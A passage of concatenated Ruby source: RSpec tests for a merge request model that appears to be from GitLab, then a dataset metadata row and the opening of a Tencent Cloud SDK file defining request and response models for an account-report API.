.to receive(:running?)
.with(rebase_jid)
.and_return(true)
expect { execute }.to raise_error(ActiveRecord::StaleObjectError)
end
it 'refuses to enqueue a job if the MR is not open' do
merge_request.update_column(:state, 'foo')
expect(RebaseWorker).not_to receive(:perform_async)
expect { execute }.to raise_error(ActiveRecord::StaleObjectError)
end
end
describe '#mergeable?' do
let(:project) { create(:project) }
subject { create(:merge_request, source_project: project) }
it 'returns false if #mergeable_state? is false' do
expect(subject).to receive(:mergeable_state?) { false }
expect(subject.mergeable?).to be_falsey
end
it 'return true if #mergeable_state? is true and the MR #can_be_merged? is true' do
allow(subject).to receive(:mergeable_state?) { true }
expect(subject).to receive(:check_mergeability)
expect(subject).to receive(:can_be_merged?) { true }
expect(subject.mergeable?).to be_truthy
end
end
describe '#mergeable_state?' do
let(:project) { create(:project, :repository) }
subject { create(:merge_request, source_project: project) }
it 'checks if merge request can be merged' do
allow(subject).to receive(:mergeable_ci_state?) { true }
expect(subject).to receive(:check_mergeability)
subject.mergeable?
end
context 'when not open' do
before do
subject.close
end
it 'returns false' do
expect(subject.mergeable_state?).to be_falsey
end
end
context 'when working in progress' do
before do
subject.title = 'WIP MR'
end
it 'returns false' do
expect(subject.mergeable_state?).to be_falsey
end
end
context 'when broken' do
before do
allow(subject).to receive(:broken?) { true }
end
it 'returns false' do
expect(subject.mergeable_state?).to be_falsey
end
end
context 'when failed' do
context 'when #mergeable_ci_state? is false' do
before do
allow(subject).to receive(:mergeable_ci_state?) { false }
end
it 'returns false' do
expect(subject.mergeable_state?).to be_falsey
end
end
context 'when #mergeable_discussions_state? is false' do
before do
allow(subject).to receive(:mergeable_discussions_state?) { false }
end
it 'returns false' do
expect(subject.mergeable_state?).to be_falsey
end
it 'returns true when skipping discussions check' do
expect(subject.mergeable_state?(skip_discussions_check: true)).to be(true)
end
end
end
end
describe '#mergeable_ci_state?' do
let(:project) { create(:project, only_allow_merge_if_pipeline_succeeds: true) }
let(:pipeline) { create(:ci_empty_pipeline) }
subject { build(:merge_request, target_project: project) }
context 'when it is only allowed to merge when build is green' do
context 'and a failed pipeline is associated' do
before do
pipeline.update(status: 'failed', sha: subject.diff_head_sha)
allow(subject).to receive(:head_pipeline) { pipeline }
end
it { expect(subject.mergeable_ci_state?).to be_falsey }
end
context 'and a successful pipeline is associated' do
before do
pipeline.update(status: 'success', sha: subject.diff_head_sha)
allow(subject).to receive(:head_pipeline) { pipeline }
end
it { expect(subject.mergeable_ci_state?).to be_truthy }
end
context 'and a skipped pipeline is associated' do
before do
pipeline.update(status: 'skipped', sha: subject.diff_head_sha)
allow(subject).to receive(:head_pipeline) { pipeline }
end
it { expect(subject.mergeable_ci_state?).to be_truthy }
end
context 'when no pipeline is associated' do
before do
allow(subject).to receive(:head_pipeline) { nil }
end
it { expect(subject.mergeable_ci_state?).to be_falsey }
end
end
context 'when merges are not restricted to green builds' do
subject { build(:merge_request, target_project: create(:project, only_allow_merge_if_pipeline_succeeds: false)) }
context 'and a failed pipeline is associated' do
before do
pipeline.statuses << create(:commit_status, status: 'failed', project: project)
allow(subject).to receive(:head_pipeline) { pipeline }
end
it { expect(subject.mergeable_ci_state?).to be_truthy }
end
context 'when no pipeline is associated' do
before do
allow(subject).to receive(:head_pipeline) { nil }
end
it { expect(subject.mergeable_ci_state?).to be_truthy }
end
end
end
describe '#mergeable_discussions_state?' do
let(:merge_request) { create(:merge_request_with_diff_notes, source_project: project) }
context 'when project.only_allow_merge_if_all_discussions_are_resolved == true' do
let(:project) { create(:project, :repository, only_allow_merge_if_all_discussions_are_resolved: true) }
context 'with all discussions resolved' do
before do
merge_request.discussions.each { |d| d.resolve!(merge_request.author) }
end
it 'returns true' do
expect(merge_request.mergeable_discussions_state?).to be_truthy
end
end
context 'with unresolved discussions' do
before do
merge_request.discussions.each(&:unresolve!)
end
it 'returns false' do
expect(merge_request.mergeable_discussions_state?).to be_falsey
end
end
context 'with no discussions' do
before do
merge_request.notes.destroy_all # rubocop: disable DestroyAll
end
it 'returns true' do
expect(merge_request.mergeable_discussions_state?).to be_truthy
end
end
end
context 'when project.only_allow_merge_if_all_discussions_are_resolved == false' do
let(:project) { create(:project, :repository, only_allow_merge_if_all_discussions_are_resolved: false) }
context 'with unresolved discussions' do
before do
merge_request.discussions.each(&:unresolve!)
end
it 'returns true' do
expect(merge_request.mergeable_discussions_state?).to be_truthy
end
end
end
end
describe "#environments_for" do
let(:project) { create(:project, :repository) }
let(:user) { project.creator }
let(:merge_request) { create(:merge_request, source_project: project) }
before do
merge_request.source_project.add_maintainer(user)
merge_request.target_project.add_maintainer(user)
end
context 'with multiple environments' do
let(:environments) { create_list(:environment, 3, project: project) }
before do
create(:deployment, :success, environment: environments.first, ref: 'master', sha: project.commit('master').id)
create(:deployment, :success, environment: environments.second, ref: 'feature', sha: project.commit('feature').id)
end
it 'selects deployed environments' do
expect(merge_request.environments_for(user)).to contain_exactly(environments.first)
end
end
context 'with environments on source project' do
let(:source_project) { fork_project(project, nil, repository: true) }
let(:merge_request) do
create(:merge_request,
source_project: source_project, source_branch: 'feature',
target_project: project)
end
let(:source_environment) { create(:environment, project: source_project) }
before do
create(:deployment, :success, environment: source_environment, ref: 'feature', sha: merge_request.diff_head_sha)
end
it 'selects deployed environments' do
expect(merge_request.environments_for(user)).to contain_exactly(source_environment)
end
context 'with environments on target project' do
let(:target_environment) { create(:environment, project: project) }
before do
create(:deployment, :success, environment: target_environment, tag: true, sha: merge_request.diff_head_sha)
end
it 'selects deployed environments' do
expect(merge_request.environments_for(user)).to contain_exactly(source_environment, target_environment)
end
end
end
context 'without a diff_head_commit' do
before do
expect(merge_request).to receive(:diff_head_commit).and_return(nil)
end
it 'returns an empty array' do
expect(merge_request.environments_for(user)).to be_empty
end
end
end
describe "#environments" do
subject { merge_request.environments }
let(:merge_request) { create(:merge_request, source_branch: 'feature', target_branch: 'master') }
let(:project) { merge_request.project }
let(:pipeline) do
create(:ci_pipeline,
source: :merge_request_event,
merge_request: merge_request, project: project,
sha: merge_request.diff_head_sha,
merge_requests_as_head_pipeline: [merge_request])
end
let!(:job) { create(:ci_build, :start_review_app, pipeline: pipeline, project: project) }
it 'returns environments' do
is_expected.to eq(pipeline.environments)
expect(subject.count).to be(1)
end
context 'when pipeline is not associated with environments' do
let!(:job) { create(:ci_build, pipeline: pipeline, project: project) }
it 'returns empty array' do
is_expected.to be_empty
end
end
context 'when pipeline is not a pipeline for merge request' do
let(:pipeline) do
create(:ci_pipeline,
project: project,
ref: 'feature',
sha: merge_request.diff_head_sha,
merge_requests_as_head_pipeline: [merge_request])
end
it 'returns empty relation' do
is_expected.to be_empty
end
end
end
describe "#reload_diff" do
it 'calls MergeRequests::ReloadDiffsService#execute with correct params' do
user = create(:user)
service = instance_double(MergeRequests::ReloadDiffsService, execute: nil)
expect(MergeRequests::ReloadDiffsService)
.to receive(:new).with(subject, user)
.and_return(service)
subject.reload_diff(user)
expect(service).to have_received(:execute)
end
context 'when using the after_update hook to update' do
context 'when the branches are updated' do
it 'uses the new heads to generate the diff' do
expect { subject.update!(source_branch: subject.target_branch, target_branch: subject.source_branch) }
.to change { subject.merge_request_diff.start_commit_sha }
.and change { subject.merge_request_diff.head_commit_sha }
end
end
end
end
describe '#update_diff_discussion_positions' do
let(:discussion) { create(:diff_note_on_merge_request, project: subject.project, noteable: subject).to_discussion }
let(:commit) { subject.project.commit(sample_commit.id) }
let(:old_diff_refs) { subject.diff_refs }
before do
# Update merge_request_diff so that #diff_refs will return commit.diff_refs
allow(subject).to receive(:create_merge_request_diff) do
subject.merge_request_diffs.create(
base_commit_sha: commit.parent_id,
start_commit_sha: commit.parent_id,
head_commit_sha: commit.sha
)
subject.reload_merge_request_diff
end
end
it "updates diff discussion positions" do
expect(Discussions::UpdateDiffPositionService).to receive(:new).with(
subject.project,
subject.author,
old_diff_refs: old_diff_refs,
new_diff_refs: commit.diff_refs,
paths: discussion.position.paths
).and_call_original
expect_any_instance_of(Discussions::UpdateDiffPositionService).to receive(:execute).with(discussion).and_call_original
expect_any_instance_of(DiffNote).to receive(:save).once
subject.update_diff_discussion_positions(old_diff_refs: old_diff_refs,
new_diff_refs: commit.diff_refs,
current_user: subject.author)
end
context 'when resolve_outdated_diff_discussions is set' do
before do
discussion
subject.project.update!(resolve_outdated_diff_discussions: true)
end
it 'calls MergeRequests::ResolvedDiscussionNotificationService' do
expect_any_instance_of(MergeRequests::ResolvedDiscussionNotificationService)
.to receive(:execute).with(subject)
subject.update_diff_discussion_positions(old_diff_refs: old_diff_refs,
new_diff_refs: commit.diff_refs,
current_user: subject.author)
end
end
end
describe '#branch_merge_base_commit' do
context 'source and target branch exist' do
it { expect(subject.branch_merge_base_commit.sha).to eq('ae73cb07c9eeaf35924a10f713b364d32b2dd34f') }
it { expect(subject.branch_merge_base_commit).to be_a(Commit) }
end
context 'when the target branch does not exist' do
before do
subject.project.repository.rm_branch(subject.author, subject.target_branch)
subject.clear_memoized_shas
end
it 'returns nil' do
expect(subject.branch_merge_base_commit).to be_nil
end
end
end
describe "#diff_refs" do
context "with diffs" do
subject { create(:merge_request, :with_diffs) }
let(:expected_diff_refs) do
Gitlab::Diff::DiffRefs.new(
base_sha: subject.merge_request_diff.base_commit_sha,
start_sha: subject.merge_request_diff.start_commit_sha,
head_sha: subject.merge_request_diff.head_commit_sha
)
end
it "does not touch the repository" do
subject # Instantiate the object
expect_any_instance_of(Repository).not_to receive(:commit)
subject.diff_refs
end
it "returns expected diff_refs" do
expect(subject.diff_refs).to eq(expected_diff_refs)
end
context 'when importing' do
before do
subject.importing = true
end
it "returns MR diff_refs" do
expect(subject.diff_refs).to eq(expected_diff_refs)
end
end
end
end
describe "#source_project_missing?" do
let(:project) { create(:project) }
let(:forked_project) { fork_project(project) }
let(:user) { create(:user) }
let(:unlink_project) { Projects::UnlinkForkService.new(forked_project, user) }
context "when the fork exists" do
let(:merge_request) do
create(:merge_request,
source_project: forked_project,
target_project: project)
end
it { expect(merge_request.source_project_missing?).to be_falsey }
end
context "when the source project is the same as the target project" do
let(:merge_request) { create(:merge_request, source_project: project) }
it { expect(merge_request.source_project_missing?).to be_falsey }
end
context "when the fork does not exist" do
let!(:merge_request) do
create(:merge_request,
source_project: forked_project,
target_project: project)
end
it "returns true" do
unlink_project.execute
merge_request.reload
expect(merge_request.source_project_missing?).to be_truthy
end
end
end
describe '#merge_ongoing?' do
it 'returns true when the merge request is locked' do
merge_request = build_stubbed(:merge_request, state: :locked)
expect(merge_request.merge_ongoing?).to be(true)
end
it 'returns true when merge_id, MR is not merged and it has no running job' do
merge_request = build_stubbed(:merge_request, state: :open, merge_jid: 'foo')
allow(Gitlab::SidekiqStatus).to receive(:running?).with('foo') { true }
expect(merge_request.merge_ongoing?).to be(true)
end
it 'returns false when merge_jid is nil' do
merge_request = build_stubbed(:merge_request, state: :open, merge_jid: nil)
expect(merge_request.merge_ongoing?).to be(false)
end
it 'returns false if MR is merged' do
merge_request = build_stubbed(:merge_request, state: :merged, merge_jid: 'foo')
expect(merge_request.merge_ongoing?).to be(false)
end
it 'returns false if there is no merge job running' do
merge_request = build_stubbed(:merge_request, state: :open, merge_jid: 'foo')
allow(Gitlab::SidekiqStatus).to receive(:running?).with('foo') { false }
expect(merge_request.merge_ongoing?).to be(false)
end
end
describe "#closed_without_fork?" do
let(:project) { create(:project) }
let(:forked_project) { fork_project(project) }
let(:user) { create(:user) }
let(:unlink_project) { Projects::UnlinkForkService.new(forked_project, user) }
context "when the merge request is closed" do
let(:closed_merge_request) do
create(:closed_merge_request,
source_project: forked_project,
target_project: project)
end
it "returns false if the fork exist" do
expect(closed_merge_request.closed_without_fork?).to be_falsey
end
it "returns true if the fork does not exist" do
unlink_project.execute
closed_merge_request.reload
expect(closed_merge_request.closed_without_fork?).to be_truthy
end
end
context "when the merge request is open" do
let(:open_merge_request) do
create(:merge_request,
source_project: forked_project,
target_project: project)
end
it "returns false" do
expect(open_merge_request.closed_without_fork?).to be_falsey
end
end
end
describe '#reopenable?' do
context 'when the merge request is closed' do
it 'returns true' do
subject.close
expect(subject.reopenable?).to be_truthy
end
context 'forked project' do
let(:project) { create(:project, :public) }
let(:user) { create(:user) }
let(:forked_project) { fork_project(project, user) }
let!(:merge_request) do
create(:closed_merge_request,
source_project: forked_project,
target_project: project)
end
it 'returns false if unforked' do
Projects::UnlinkForkService.new(forked_project, user).execute
expect(merge_request.reload.reopenable?).to be_falsey
end
it 'returns false if the source project is deleted' do
Projects::DestroyService.new(forked_project, user).execute
expect(merge_request.reload.reopenable?).to be_falsey
end
it 'returns false if the merge request is merged' do
merge_request.update(state: 'merged')
expect(merge_request.reload.reopenable?).to be_falsey
end
end
end
context 'when the merge request is opened' do
it 'returns false' do
expect(subject.reopenable?).to be_falsey
end
end
end
describe '#mergeable_with_quick_action?' do
def create_pipeline(status)
pipeline = create(:ci_pipeline_with_one_job,
project: project,
ref: merge_request.source_branch,
sha: merge_request.diff_head_sha,
status: status,
head_pipeline_of: merge_request)
pipeline
end
let(:project) { create(:project, :public, :repository, only_allow_merge_if_pipeline_succeeds: true) }
let(:developer) { create(:user) }
let(:user) { create(:user) }
let(:merge_request) { create(:merge_request, source_project: project) }
let(:mr_sha) { merge_request.diff_head_sha }
before do
project.add_developer(developer)
end
context 'when autocomplete_precheck is set to true' do
it 'is mergeable by developer' do
expect(merge_request.mergeable_with_quick_action?(developer, autocomplete_precheck: true)).to be_truthy
end
it 'is not mergeable by normal user' do
expect(merge_request.mergeable_with_quick_action?(user, autocomplete_precheck: true)).to be_falsey
end
end
context 'when autocomplete_precheck is set to false' do
it 'is mergeable by developer' do
expect(merge_request.mergeable_with_quick_action?(developer, last_diff_sha: mr_sha)).to be_truthy
end
it 'is not mergeable by normal user' do
expect(merge_request.mergeable_with_quick_action?(user, last_diff_sha: mr_sha)).to be_falsey
end
context 'closed MR' do
before do
merge_request.update_attribute(:state, :closed)
end
it 'is not mergeable' do
expect(merge_request.mergeable_with_quick_action?(developer, last_diff_sha: mr_sha)).to be_falsey
end
end
context 'MR with WIP' do
before do
merge_request.update_attribute(:title, 'WIP: some MR')
end
it 'is not mergeable' do
expect(merge_request.mergeable_with_quick_action?(developer, last_diff_sha: mr_sha)).to be_falsey
end
end
context 'sha differs from the MR diff_head_sha' do
it 'is not mergeable' do
expect(merge_request.mergeable_with_quick_action?(developer, last_diff_sha: 'some other sha')).to be_falsey
end
end
context 'sha is not provided' do
it 'is not mergeable' do
expect(merge_request.mergeable_with_quick_action?(developer)).to be_falsey
end
end
context 'with pipeline ok' do
before do
create_pipeline(:success)
end
it 'is mergeable' do
expect(merge_request.mergeable_with_quick_action?(developer, last_diff_sha: mr_sha)).to be_truthy
end
end
context 'with failing pipeline' do
before do
create_pipeline(:failed)
end
it 'is not mergeable' do
expect(merge_request.mergeable_with_quick_action?(developer, last_diff_sha: mr_sha)).to be_falsey
end
end
context 'with running pipeline' do
before do
create_pipeline(:running)
end
it 'is mergeable' do
expect(merge_request.mergeable_with_quick_action?(developer, last_diff_sha: mr_sha)).to be_truthy
end
end
end
end
describe '#base_pipeline' do
let(:pipeline_arguments) do
{
project: project,
ref: merge_request.target_branch,
sha: merge_request.diff_base_sha
}
end
let(:project) { create(:project, :public, :repository) }
let(:merge_request) { create(:merge_request, source_project: project) }
let!(:first_pipeline) { create(:ci_pipeline_without_jobs, pipeline_arguments) }
let!(:last_pipeline) { create(:ci_pipeline_without_jobs, pipeline_arguments) }
let!(:last_pipeline_with_other_ref) { create(:ci_pipeline_without_jobs, pipeline_arguments.merge(ref: 'other')) }
it 'returns latest pipeline for the target branch' do
expect(merge_request.base_pipeline).to eq(last_pipeline)
end
end
describe '#has_commits?' do
it 'returns true when merge request diff has commits' do
allow(subject.merge_request_diff).to receive(:commits_count)
.and_return(2)
expect(subject.has_commits?).to be_truthy
end
context 'when commits_count is nil' do
it 'returns false' do
allow(subject.merge_request_diff).to receive(:commits_count)
.and_return(nil)
expect(subject.has_commits?).to be_falsey
end
end
end
describe '#has_no_commits?' do
before do
allow(subject.merge_request_diff).to receive(:commits_count)
.and_return(0)
end
it 'returns true when merge request diff has 0 commits' do
expect(subject.has_no_commits?).to be_truthy
end
end
describe '#merge_request_diff_for' do
subject { create(:merge_request, importing: true) }
let!(:merge_request_diff1) { subject.merge_request_diffs.create(head_commit_sha: '6f6d7e7ed97bb5f0054f2b1df789b39ca89b6ff9') }
let!(:merge_request_diff2) { subject.merge_request_diffs.create(head_commit_sha: nil) }
let!(:merge_request_diff3) { subject.merge_request_diffs.create(head_commit_sha: '5937ac0a7beb003549fc5fd26fc247adbce4a52e') }
context 'with diff refs' do
it 'returns the diffs' do
expect(subject.merge_request_diff_for(merge_request_diff1.diff_refs)).to eq(merge_request_diff1)
end
end
context 'with a commit SHA' do
it 'returns the diffs' do
expect(subject.merge_request_diff_for(merge_request_diff3.head_commit_sha)).to eq(merge_request_diff3)
end
end
it 'runs a single query on the initial call, and none afterwards' do
expect { subject.merge_request_diff_for(merge_request_diff1.diff_refs) }
.not_to exceed_query_limit(1)
expect { subject.merge_request_diff_for(merge_request_diff2.diff_refs) }
.not_to exceed_query_limit(0)
expect { subject.merge_request_diff_for(merge_request_diff3.head_commit_sha) }
.not_to exceed_query_limit(0)
end
end
describe '#version_params_for' do
subject { create(:merge_request, importing: true) }
let(:project) { subject.project }
let!(:merge_request_diff1) { subject.merge_request_diffs.create(head_commit_sha: '6f6d7e7ed97bb5f0054f2b1df789b39ca89b6ff9') }
let!(:merge_request_diff2) { subject.merge_request_diffs.create(head_commit_sha: nil) }
let!(:merge_request_diff3) { subject.merge_request_diffs.create(head_commit_sha: '5937ac0a7beb003549fc5fd26fc247adbce4a52e') }
context 'when the diff refs are for an older merge request version' do
let(:diff_refs) { merge_request_diff1.diff_refs }
it 'returns the diff ID for the version to show' do
expect(subject.version_params_for(diff_refs)).to eq(diff_id: merge_request_diff1.id)
end
end
context 'when the diff refs are for a comparison between merge request versions' do
let(:diff_refs) { merge_request_diff3.compare_with(merge_request_diff1.head_commit_sha).diff_refs }
it 'returns the diff ID and start sha of the versions to compare' do
expect(subject.version_params_for(diff_refs)).to eq(diff_id: merge_request_diff3.id, start_sha: merge_request_diff1.head_commit_sha)
end
end
context 'when the diff refs are not for a merge request version' do
let(:diff_refs) { project.commit(sample_commit.id).diff_refs }
it 'returns nil' do
expect(subject.version_params_for(diff_refs)).to be_nil
end
end
end
describe '#fetch_ref!' do
it 'fetches the ref correctly' do
expect { subject.target_project.repository.delete_refs(subject.ref_path) }.not_to raise_error
subject.fetch_ref!
expect(subject.target_project.repository.ref_exists?(subject.ref_path)).to be_truthy
end
end
describe 'removing a merge request' do
it 'refreshes the number of open merge requests of the target project' do
project = subject.target_project
expect { subject.destroy }
.to change { project.open_merge_requests_count }.from(1).to(0)
end
end
it_behaves_like 'throttled touch' do
subject { create(:merge_request, updated_at: 1.hour.ago) }
end
context 'state machine transitions' do
describe '#unlock_mr' do
subject { create(:merge_request, state: 'locked', merge_jid: 123) }
it 'updates merge request head pipeline and sets merge_jid to nil' do
pipeline = create(:ci_empty_pipeline, project: subject.project, ref: subject.source_branch, sha: subject.source_branch_sha)
subject.unlock_mr
subject.reload
expect(subject.head_pipeline).to eq(pipeline)
expect(subject.merge_jid).to be_nil
end
end
describe 'transition to cannot_be_merged' do
let(:notification_service) { double(:notification_service) }
let(:todo_service) { double(:todo_service) }
subject { create(:merge_request, state, merge_status: :unchecked) }
before do
allow(NotificationService).to receive(:new).and_return(notification_service)
allow(TodoService).to receive(:new).and_return(todo_service)
allow(subject.project.repository).to receive(:can_be_merged?).and_return(false)
end
[:opened, :locked].each do |state|
context state do
let(:state) { state }
it 'notifies conflict, but does not notify again if rechecking still results in cannot_be_merged' do
expect(notification_service).to receive(:merge_request_unmergeable).with(subject).once
expect(todo_service).to receive(:merge_request_became_unmergeable).with(subject).once
subject.mark_as_unmergeable
subject.mark_as_unchecked
subject.mark_as_unmergeable
end
it 'notifies conflict, whenever newly unmergeable' do
expect(notification_service).to receive(:merge_request_unmergeable).with(subject).twice
expect(todo_service).to receive(:merge_request_became_unmergeable).with(subject).twice
subject.mark_as_unmergeable
subject.mark_as_unchecked
subject.mark_as_mergeable
subject.mark_as_unchecked
subject.mark_as_unmergeable
end
it 'does not notify whenever merge request is newly unmergeable due to other reasons' do
allow(subject.project.repository).to receive(:can_be_merged?).and_return(true)
expect(notification_service).not_to receive(:merge_request_unmergeable)
expect(todo_service).not_to receive(:merge_request_became_unmergeable)
subject.mark_as_unmergeable
end
end
end
[:closed, :merged].each do |state|
let(:state) { state }
context state do
it 'does not notify' do
expect(notification_service).not_to receive(:merge_request_unmergeable)
expect(todo_service).not_to receive(:merge_request_became_unmergeable)
subject.mark_as_unmergeable
end
end
end
context 'source branch is missing' do
subject { create(:merge_request, :invalid, :opened, merge_status: :unchecked, target_branch: 'master') }
before do
allow(subject.project.repository).to receive(:can_be_merged?).and_call_original
end
it 'does not raise error' do
expect(notification_service).not_to receive(:merge_request_unmergeable)
expect(todo_service).not_to receive(:merge_request_became_unmergeable)
expect { subject.mark_as_unmergeable }.not_to raise_error
expect(subject.cannot_be_merged?).to eq(true)
end
end
end
describe 'check_state?' do
it 'indicates whether MR is still checking for mergeability' do
state_machine = described_class.state_machines[:merge_status]
check_states = [:unchecked, :cannot_be_merged_recheck]
check_states.each do |merge_status|
expect(state_machine.check_state?(merge_status)).to be true
end
(state_machine.states.map(&:name) - check_states).each do |merge_status|
expect(state_machine.check_state?(merge_status)).to be false
end
end
end
end
describe '#should_be_rebased?' do
let(:project) { create(:project, :repository) }
it 'returns false for the same source and target branches' do
merge_request = create(:merge_request, source_project: project, target_project: project)
expect(merge_request.should_be_rebased?).to be_falsey
end
end
describe '#rebase_in_progress?' do
where(:rebase_jid, :jid_valid, :result) do
'foo' | true | true
'foo' | false | false
'' | true | false
nil | true | false
end
with_them do
let(:merge_request) { create(:merge_request) }
subject { merge_request.rebase_in_progress? }
it do
allow(Gitlab::SidekiqStatus).to receive(:running?).with(rebase_jid) { jid_valid }
merge_request.rebase_jid = rebase_jid
is_expected.to eq(result)
end
end
end
describe '#allow_collaboration' do
let(:merge_request) do
build(:merge_request, source_branch: 'fixes', allow_collaboration: true)
end
it 'is false when pushing by a maintainer is not possible' do
expect(merge_request).to receive(:collaborative_push_possible?) { false }
expect(merge_request.allow_collaboration).to be_falsy
end
it 'is true when pushing by a maintainer is possible' do
expect(merge_request).to receive(:collaborative_push_possible?) { true }
expect(merge_request.allow_collaboration).to be_truthy
end
end
describe '#collaborative_push_possible?' do
let(:merge_request) do
build(:merge_request, source_branch: 'fixes')
end
before do
allow(ProtectedBranch).to receive(:protected?) { false }
end
it 'does not allow maintainer to push if the source project is the same as the target' do
merge_request.target_project = merge_request.source_project = create(:project, :public)
expect(merge_request.collaborative_push_possible?).to be_falsy
end
it 'allows maintainer to push when both source and target are public' do
merge_request.target_project = build(:project, :public)
merge_request.source_project = build(:project, :public)
expect(merge_request.collaborative_push_possible?).to be_truthy
end
it 'is not available for protected branches' do
merge_request.target_project = build(:project, :public)
merge_request.source_project = build(:project, :public)
expect(ProtectedBranch).to receive(:protected?)
.with(merge_request.source_project, 'fixes')
.and_return(true)
expect(merge_request.collaborative_push_possible?).to be_falsy
end
end
describe '#includes_any_commits?' do
it 'returns false' do
expect(subject.includes_any_commits?([])).to be_falsey
end
it 'returns false' do
expect(subject.includes_any_commits?([Gitlab::Git::BLANK_SHA])).to be_falsey
end
it 'returns true' do
expect(subject.includes_any_commits?([subject.merge_request_diff.head_commit_sha])).to be_truthy
end
it 'returns true even when there is a non-existent comit' do
expect(subject.includes_any_commits?([Gitlab::Git::BLANK_SHA, subject.merge_request_diff.head_commit_sha])).to be_truthy
end
context 'unpersisted merge request' do
let(:new_mr) { build(:merge_request) }
it 'returns false' do
expect(new_mr.includes_any_commits?([Gitlab::Git::BLANK_SHA])).to be_falsey
end
it 'returns true' do
expect(new_mr.includes_any_commits?([subject.merge_request_diff.head_commit_sha])).to be_truthy
end
end
end
describe '#can_allow_collaboration?' do
let(:target_project) { create(:project, :public) }
let(:source_project) { fork_project(target_project) }
let(:merge_request) do
create(:merge_request,
source_project: source_project,
source_branch: 'fixes',
target_project: target_project)
end
let(:user) { create(:user) }
before do
allow(merge_request).to receive(:collaborative_push_possible?) { true }
end
it 'is false if the user does not have push access to the source project' do
expect(merge_request.can_allow_collaboration?(user)).to be_falsy
end
it 'is true when the user has push access to the source project' do
source_project.add_developer(user)
expect(merge_request.can_allow_collaboration?(user)).to be_truthy
end
end
describe '#merge_participants' do
it 'contains author' do
expect(subject.merge_participants).to eq([subject.author])
end
describe 'when merge_when_pipeline_succeeds? is true' do
describe 'when merge user is author' do
let(:user) { create(:user) }
subject do
create(:merge_request,
merge_when_pipeline_succeeds: true,
merge_user: user,
author: user)
end
it 'contains author only' do
expect(subject.merge_participants).to eq([subject.author])
end
end
describe 'when merge user and author are different users' do
let(:merge_user) { create(:user) }
subject do
create(:merge_request,
merge_when_pipeline_succeeds: true,
merge_user: merge_user)
end
it 'contains author and merge user' do
expect(subject.merge_participants).to eq([subject.author, merge_user])
end
end
end
end
describe '.merge_request_ref?' do
subject { described_class.merge_request_ref?(ref) }
context 'when ref is ref name of a branch' do
let(:ref) { 'feature' }
it { is_expected.to be_falsey }
end
context 'when ref is HEAD ref path of a branch' do
let(:ref) { 'refs/heads/feature' }
it { is_expected.to be_falsey }
end
context 'when ref is HEAD ref path of a merge request' do
let(:ref) { 'refs/merge-requests/1/head' }
it { is_expected.to be_truthy }
end
context 'when ref is merge ref path of a merge request' do
let(:ref) { 'refs/merge-requests/1/merge' }
it { is_expected.to be_truthy }
end
end
describe '.merge_train_ref?' do
subject { described_class.merge_train_ref?(ref) }
context 'when ref is ref name of a branch' do
let(:ref) { 'feature' }
it { is_expected.to be_falsey }
end
context 'when ref is HEAD ref path of a branch' do
let(:ref) { 'refs/heads/feature' }
it { is_expected.to be_falsey }
end
context 'when ref is HEAD ref path of a merge request' do
let(:ref) { 'refs/merge-requests/1/head' }
it { is_expected.to be_falsey }
end
context 'when ref is merge ref path of a merge request' do
let(:ref) { 'refs/merge-requests/1/merge' }
it { is_expected.to be_falsey }
end
context 'when ref is train ref path of a merge request' do
let(:ref) { 'refs/merge-requests/1/train' }
it { is_expected.to be_truthy }
end
end
describe '#cleanup_refs' do
subject { merge_request.cleanup_refs(only: only) }
let(:merge_request) { build(:merge_request) }
context 'when removing all refs' do
let(:only) { :all }
it 'deletes all refs from the target project' do
expect(merge_request.target_project.repository)
.to receive(:delete_refs)
.with(merge_request.ref_path, merge_request.merge_ref_path, merge_request.train_ref_path)
subject
end
end
context 'when removing only train ref' do
let(:only) { :train }
it 'deletes train ref from the target project' do
expect(merge_request.target_project.repository)
.to receive(:delete_refs)
.with(merge_request.train_ref_path)
subject
end
end
end
end
| 32.490803 | 145 | 0.667113 |
286aa2478d71e99ba39ecf8c68fb0bb54ede11ff | 22,191 | # frozen_string_literal: true
# Copyright (c) 2017-2018 THL A29 Limited, a Tencent company. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
module TencentCloud
module Tms
module V20200713
# AccountTipoffAccess请求参数结构体
class AccountTipoffAccessRequest < TencentCloud::Common::AbstractModel
# @param ReportedAccount: 被举报账号,长度低于 128 个字符
# @type ReportedAccount: String
# @param ReportedAccountType: 被举报账号类型(1-手机号 2-QQ号 3-微信号 4-QQ群号 5-微信openid 6-QQopenid 0-其它)
# @type ReportedAccountType: Integer
# @param EvilType: 被举报账号所属恶意类型(1-诈骗,2-骚扰,3-广告,4-违法违规,5-赌博传销,0-其他)
# @type EvilType: Integer
# @param SenderAccount: 举报者账号,长度低于 128 个字符
# @type SenderAccount: String
# @param SenderAccountType: 举报者账号类型(1-手机号 2-QQ号 3-微信号 4-QQ群号 5-微信openid 6-QQopenid 0-其它)
# @type SenderAccountType: Integer
# @param SenderIP: 举报者IP地址
# @type SenderIP: String
# @param EvilContent: 包含被举报账号的恶意内容(比如文本、图片链接,长度低于1024个字符)
# @type EvilContent: String
attr_accessor :ReportedAccount, :ReportedAccountType, :EvilType, :SenderAccount, :SenderAccountType, :SenderIP, :EvilContent
def initialize(reportedaccount=nil, reportedaccounttype=nil, eviltype=nil, senderaccount=nil, senderaccounttype=nil, senderip=nil, evilcontent=nil)
@ReportedAccount = reportedaccount
@ReportedAccountType = reportedaccounttype
@EvilType = eviltype
@SenderAccount = senderaccount
@SenderAccountType = senderaccounttype
@SenderIP = senderip
@EvilContent = evilcontent
end
def deserialize(params)
@ReportedAccount = params['ReportedAccount']
@ReportedAccountType = params['ReportedAccountType']
@EvilType = params['EvilType']
@SenderAccount = params['SenderAccount']
@SenderAccountType = params['SenderAccountType']
@SenderIP = params['SenderIP']
@EvilContent = params['EvilContent']
end
end
# AccountTipoffAccess返回参数结构体
class AccountTipoffAccessResponse < TencentCloud::Common::AbstractModel
# @param Data: 举报接口响应数据
# 注意:此字段可能返回 null,表示取不到有效值。
# @type Data: :class:`Tencentcloud::Tms.v20200713.models.TipoffResponse`
# @param RequestId: 唯一请求 ID,每次请求都会返回。定位问题时需要提供该次请求的 RequestId。
# @type RequestId: String
attr_accessor :Data, :RequestId
def initialize(data=nil, requestid=nil)
@Data = data
@RequestId = requestid
end
def deserialize(params)
unless params['Data'].nil?
